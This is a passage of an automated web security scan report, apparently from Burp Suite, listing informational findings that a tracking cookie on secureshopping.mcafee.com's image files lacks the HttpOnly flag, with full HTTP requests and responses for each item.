Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:31 GMT
ETag: "5D7pOrfoU3+"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:31 GMT
Content-Length: 1527

GIF89a\..........P....hhh.....P.......@................888ph`HHH.........ppp...PPPxxx...XXX```@@@...((( 000...........................................................................................
...[SNIP]...

4.175. http://secureshopping.mcafee.com/images/addto_mymsn.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/addto_mymsn.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/addto_mymsn.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:32 GMT
ETag: "5D7pOrfoU2q"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:32 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:32 GMT
Content-Length: 1443

GIF89aM.........t..(A.5L.gy..........K..Vi.......F\..X,....9.......R........[...........c...v3z..J....D...[.....S..:Q.................../....t.....|....1n........l.......fd..........................
...[SNIP]...

4.176. http://secureshopping.mcafee.com/images/addto_myyahoo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/addto_myyahoo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/addto_myyahoo.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:31 GMT
ETag: "5D7pOrfoUrW"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:31 GMT
Content-Length: 719

GIF89a[..............!......^^^Js..Z`.3.TTT....<C......&.....v{....B.ttt....+2......)\...........ns.JQ...........fff~~~....ff.2.......................................................................
...[SNIP]...

4.177. http://secureshopping.mcafee.com/images/addto_netvibes.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/addto_netvibes.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/addto_netvibes.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:31 GMT
ETag: "5D7pOrfoU4C"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:31 GMT
Content-Length: 1531

GIF89a[.................._..2.5...X./.........y..En............................k..]..U..5.4.v....................................................z..q..j.....g..Y.._./^..5.45.5Kr.>h.,Y."R..............
...[SNIP]...

4.178. http://secureshopping.mcafee.com/images/banner_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_arrow.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoUg4"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:29 GMT
Content-Length: 49

GIF89a..........fff!.......,..............i...(.;

4.179. http://secureshopping.mcafee.com/images/banner_mfes_signup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_mfes_signup.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_mfes_signup.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoZKM"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:29 GMT
Content-Length: 19077

GIF89a..9........<V..........Ga......................1J..........9R.......ef.?X...............................sw....l~....Oj....6P.,E......................C^.`d......................@C....AB.WU.......
...[SNIP]...

4.180. http://secureshopping.mcafee.com/images/banner_sa.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_sa.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_sa.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoWKf"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:29 GMT
Content-Length: 6808

GIF89a..S...............7....O.(.
i.g..,.....o.....r.x...=.................... ..n...jl.....j ...W.U..B...`..........................R].......u.....^h.......~...mzA.D.9..B....a...........d...........
...[SNIP]...

4.181. http://secureshopping.mcafee.com/images/banner_tp_081610.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_tp_081610.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_tp_081610.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoWuo"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:29 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:29 GMT
Content-Length: 9121

GIF89a..S.......Y..a"2..2..?.";........C..@..C.(N.?c.;Y.Mh.\y.o...................................|...........................................|...............................................Z..Y..^.._
...[SNIP]...

4.182. http://secureshopping.mcafee.com/images/bgarea_690x250_cccccc.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/bgarea_690x250_cccccc.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bgarea_690x250_cccccc.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:32 GMT
ETag: "5D7pOrfoUwP"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:31 GMT
Content-Length: 1032

.PNG
.
...IHDR...............3.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx......0.EALK....&a...
..n.q..7.U.}d........x.@..@.8..@...28.@.....v+...1................,..d.. ...Y.....@..........,..d..
...[SNIP]...

4.183. http://secureshopping.mcafee.com/images/btn_compare_down.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/btn_compare_down.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:47:53 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_compare_down.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/computers/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.11.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:47:53 GMT
ETag: "5D7pOrfoU86"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:47:53 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:47:53 GMT
Content-Length: 1843

GIF89a..$.....5V....Oi.1R.-N....0Q.....8.z...:..=.......3T.&F.....>. @..7.......,L.2S..........$E....*J."B.6W....n..(I.>^..O............'H..7.+L._v..;..@.1O..7....@\..<.:X. @.7U.#C...................
...[SNIP]...

4.184. http://secureshopping.mcafee.com/images/btn_compare_up.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/btn_compare_up.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_compare_up.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:26 GMT
ETag: "5D7pOrfoU9P"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:25 GMT
Content-Length: 1864

GIF89a..$........5V.r........1R.Ig..8.....:..N.0Q.7X..=. @..>.&F....4T....!A..........bz.Uo....2S....*K....$D.,L.)I.8X..../O.}..m.....'G..7.;Y..;..8..?.+L..7.4R..<.2O."C.... ?.........................
...[SNIP]...

4.185. http://secureshopping.mcafee.com/images/btn_seeit_down.gif previous next

Summary

Severity:	Information
Confidence:	Certain
